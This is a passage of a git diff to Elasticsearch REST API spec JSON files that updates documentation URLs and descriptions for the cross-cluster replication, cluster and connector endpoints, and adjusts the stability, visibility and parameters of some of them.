+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-follow", + "description": "Pause a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json index 6f5f03bc9a3d2..77218122120a1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.put_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-put-auto-follow-pattern.html", - "description": "Creates a new named collection of auto-follow patterns against a specified remote cluster. Newly created indices on the remote cluster matching any of the specified patterns will be automatically configured as follower indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-put-auto-follow-pattern", + "description": "Create or update auto-follow patterns" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json index a4ea108426ed8..5a0c3dd9065fb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.resume_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-resume-auto-follow-pattern.html", - "description": "Resumes an auto-follow pattern that has been paused" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-auto-follow-pattern", + "description": "Resume an auto-follow pattern" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json index 854ff83291a8b..478e26304e22a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json @@ -1,8 +1,8 @@ { "ccr.resume_follow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-resume-follow.html", - "description": "Resumes a follower index that has been paused" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-follow", + "description": "Resume a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json index 5ebc781109abd..0cfbb3a42bbc9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json @@ -1,8 +1,8 @@ { "ccr.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-stats.html", - "description": "Gets all stats related to cross-cluster replication." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-stats", + "description": "Get cross-cluster replication stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json index 096d39fa16480..67342c484251c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json @@ -1,8 +1,8 @@ { "ccr.unfollow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-unfollow.html", - "description": "Stops the following task associated with a follower index and removes index metadata and settings associated with cross-cluster replication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-unfollow", + "description": "Unfollow an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json b/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json index 2d76e1e10d2ba..c530ee3453e24 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json @@ -1,8 +1,8 @@ { "clear_scroll":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/clear-scroll-api.html", - "description":"Explicitly clears the search context for a scroll." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-clear-scroll", + "description":"Clear a scrolling search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json b/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json index c25ac88847d1c..d9c7da2904c65 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json @@ -1,7 +1,7 @@ { "close_point_in_time":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/point-in-time-api.html", + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-open-point-in-time", "description":"Close a point in time" }, "stability":"stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json index a3922033ec2a8..d054cccedf830 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json @@ -1,8 +1,8 @@ { "cluster.allocation_explain":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-allocation-explain.html", - "description":"Provides explanations for shard allocations in the cluster." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-allocation-explain", + "description":"Explain the shard allocations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json index 041c1b35a2e5b..3a261d3d5ff52 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json @@ -1,8 +1,8 @@ { "cluster.delete_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Deletes a component template" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Delete component templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json index fdc2364e456e4..c2dc21e8795e1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json @@ -1,8 +1,8 @@ { "cluster.delete_voting_config_exclusions":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/voting-config-exclusions.html", - "description":"Clears cluster voting config exclusions." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions", + "description":"Clear cluster voting config exclusions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json index b2503659329a3..b81463accafe4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json @@ -1,8 +1,8 @@ { "cluster.exists_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Returns information about whether a particular component template exist" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Check component templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json index def0cc5fb8bb0..ae556fc86c59b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json @@ -1,8 +1,8 @@ { "cluster.get_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Returns one or more component templates" + 
"url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Get component templates" }, "stability":"stable", "visibility":"public", @@ -44,6 +44,14 @@ "include_defaults":{ "type":"boolean", "description":"Return all default configurations for the component template (default: false)" + }, + "flat_settings":{ + "type":"boolean", + "description":"Return settings in flat format (default: false)" + }, + "settings_filter":{ + "type":"string", + "description":"Filter out results, for example to filter out sensitive information. Supports wildcards or full settings keys" } } } diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json index 5004ab8de697d..978cbc43a3492 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json @@ -1,8 +1,8 @@ { "cluster.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-get-settings.html", - "description":"Returns cluster settings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-get-settings", + "description":"Get cluster-wide settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json index 91712bbbded29..177c9efa6410f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json @@ -1,8 +1,8 @@ { "cluster.health":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-health.html", - "description":"Returns basic information about the health of the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-health", + "description":"Get the cluster health status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json index 39f51bf096506..17591d49a6e46 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json @@ -1,8 +1,8 @@ { "cluster.info": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-info.html", - "description": "Returns different information about the cluster." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-info", + "description": "Get cluster info" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json index 0ce718b3fffc4..d1e3f70d8f598 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json @@ -1,8 +1,8 @@ { "cluster.pending_tasks":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-pending.html", - "description":"Returns a list of any cluster-level changes (e.g. 
create index, update mapping,\nallocate or fail shard) which have not yet been executed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-pending-tasks", + "description":"Get the pending cluster tasks" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json index 591a4e9d27f3e..cc6d0ad27af07 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json @@ -1,8 +1,8 @@ { "cluster.post_voting_config_exclusions":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/voting-config-exclusions.html", - "description":"Updates the cluster voting config exclusions by node ids or node names." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions", + "description":"Update voting configuration exclusions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json index 4b7b032b43e13..3905e89707ddf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json @@ -1,8 +1,8 @@ { "cluster.put_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Creates or updates a component template" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Create or update a component template" }, "stability":"stable", "visibility":"public", @@ -33,9 +33,10 @@ "description":"Whether the index template should only be added if new or can also replace an existing one", "default":false }, - "timeout":{ - "type":"time", - "description":"Explicit operation timeout" + "cause": { + "type": "string", + "description": "User defined reason for create the component template", + "default": "api" }, "master_timeout":{ "type":"time", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json index 77aac96571a38..2ddd9c165e93a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json @@ -1,8 +1,8 @@ { "cluster.put_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-update-settings.html", - "description":"Updates the cluster settings." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings", + "description":"Update the cluster settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json index 689d10606b0ef..5e0cf3aaa9754 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json @@ -1,8 +1,8 @@ { "cluster.remote_info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-remote-info.html", - "description":"Returns the information about configured remote clusters." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-remote-info", + "description":"Get remote cluster information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json index 81409fa507200..aa7ee0fe00603 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json @@ -1,8 +1,8 @@ { "cluster.reroute":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-reroute.html", - "description":"Allows to manually change the allocation of individual shards in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-reroute", + "description":"Reroute the cluster" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json index faf1aafd1f881..914c1fbdb2669 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json @@ -1,8 +1,8 @@ { "cluster.state":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-state.html", - "description":"Returns a comprehensive information about the state of the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-state", + "description":"Get the cluster state" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json index 23f6ed4ec5b76..21ba100888780 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json @@ -1,8 +1,8 @@ { "cluster.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-stats.html", - "description":"Returns high-level overview of cluster statistics." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-stats", + "description":"Get cluster statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json index 36535109df8e7..842c2498d9a5c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json @@ -1,8 +1,8 @@ { "connector.check_in": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/check-in-connector-api.html", - "description": "Updates the last_seen timestamp in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-check-in", + "description": "Check in a connector" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json index aa5a3dc0a791f..70ffe98ea2f30 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json @@ -1,10 +1,10 @@ { "connector.delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-connector-api.html", - "description": "Deletes a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-delete", + "description": "Delete a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json index 670bb4267bdfa..5eb3904ce93a2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json @@ -1,10 +1,10 @@ { "connector.get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-connector-api.html", - "description": "Returns the details about a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-get", + "description": "Get a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json index f6d93555b72ed..1c7fa72ee1d63 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json @@ -1,11 +1,11 @@ { "connector.last_sync": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-last-sync-api.html", - "description": "Updates the stats of last sync in the connector document." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-last-sync", + "description": "Update the connector last sync stats" }, "stability": "experimental", - "visibility": "public", + "visibility": "private", "headers": { "accept": [ "application/json" diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json index b8c73a09704f1..187f9300351b2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json @@ -1,10 +1,10 @@ { "connector.list": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-connector-api.html", - "description": "Lists all connectors." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-list", + "description": "Get all connectors" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json index 365c5353b2f48..46849133e39b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json @@ -1,10 +1,10 @@ { "connector.post": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/create-connector-api.html", - "description": "Creates a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-put", + "description": "Create a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json index dfcda983cfc45..54a629039e38f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json @@ -1,10 +1,10 @@ { "connector.put": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/create-connector-api.html", - "description": "Creates or updates a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-put", + "description": "Create or update a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json index b93f7ae94d2c4..9c2750b6c736a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json @@ -2,7 +2,7 @@ "connector.secret_delete": { "documentation": { "url": null, - "description": "Deletes a connector secret." 
+ "description": "Deletes a connector secret" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json index a4d6f34290727..5af3195b67ae0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json @@ -2,7 +2,7 @@ "connector.secret_get": { "documentation": { "url": null, - "description": "Retrieves a secret stored by Connectors." + "description": "Retrieves a secret stored by Connectors" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json index ca61b9165e3b4..1040ac5fc9964 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json @@ -2,7 +2,7 @@ "connector.secret_post": { "documentation": { "url": null, - "description": "Creates a secret for a Connector." + "description": "Creates a secret for a Connector" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json index f99d3f6176f3f..5588ba4c9e2ee 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json @@ -2,7 +2,7 @@ "connector.secret_put": { "documentation": { "url": null, - "description": "Creates or updates a secret for a Connector." + "description": "Creates or updates a secret for a Connector" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json index 4f0729a3a11ca..61a4c19c310e0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json @@ -1,10 +1,10 @@ { "connector.sync_job_cancel": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/cancel-connector-sync-job-api.html", - "description": "Cancels a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-cancel", + "description": "Cancel a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json index 10a1a40d616eb..a5aac925c5dfc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json @@ -1,8 +1,8 @@ { "connector.sync_job_check_in": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/check-in-connector-sync-job-api.html", - "description": "Checks in a connector sync job (refreshes 'last_seen')." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-check-in", + "description": "Check in a connector sync job" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json index f8d090264038a..32e4053110a4c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json @@ -1,8 +1,8 @@ { "connector.sync_job_claim": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/claim-connector-sync-job-api.html", - "description": "Claims a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-claim", + "description": "Claim a connector sync job" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json index 591cb8f0cc695..11705ff33c978 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json @@ -1,10 +1,10 @@ { "connector.sync_job_delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-connector-sync-job-api.html", - "description": "Deletes a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-delete", + "description": "Delete a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json index ea5c2a0dd0586..4ca98a5c27788 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json @@ -1,8 +1,8 @@ { "connector.sync_job_error": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/set-connector-sync-job-error-api.html", - "description": "Sets an error for a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-error", + "description": "Set a connector sync job error" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json index 8a46a1eecc6ec..540ff00f0c7a0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json @@ -1,10 +1,10 @@ { "connector.sync_job_get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-connector-sync-job-api.html", - "description": "Returns the details about a connector sync job." 
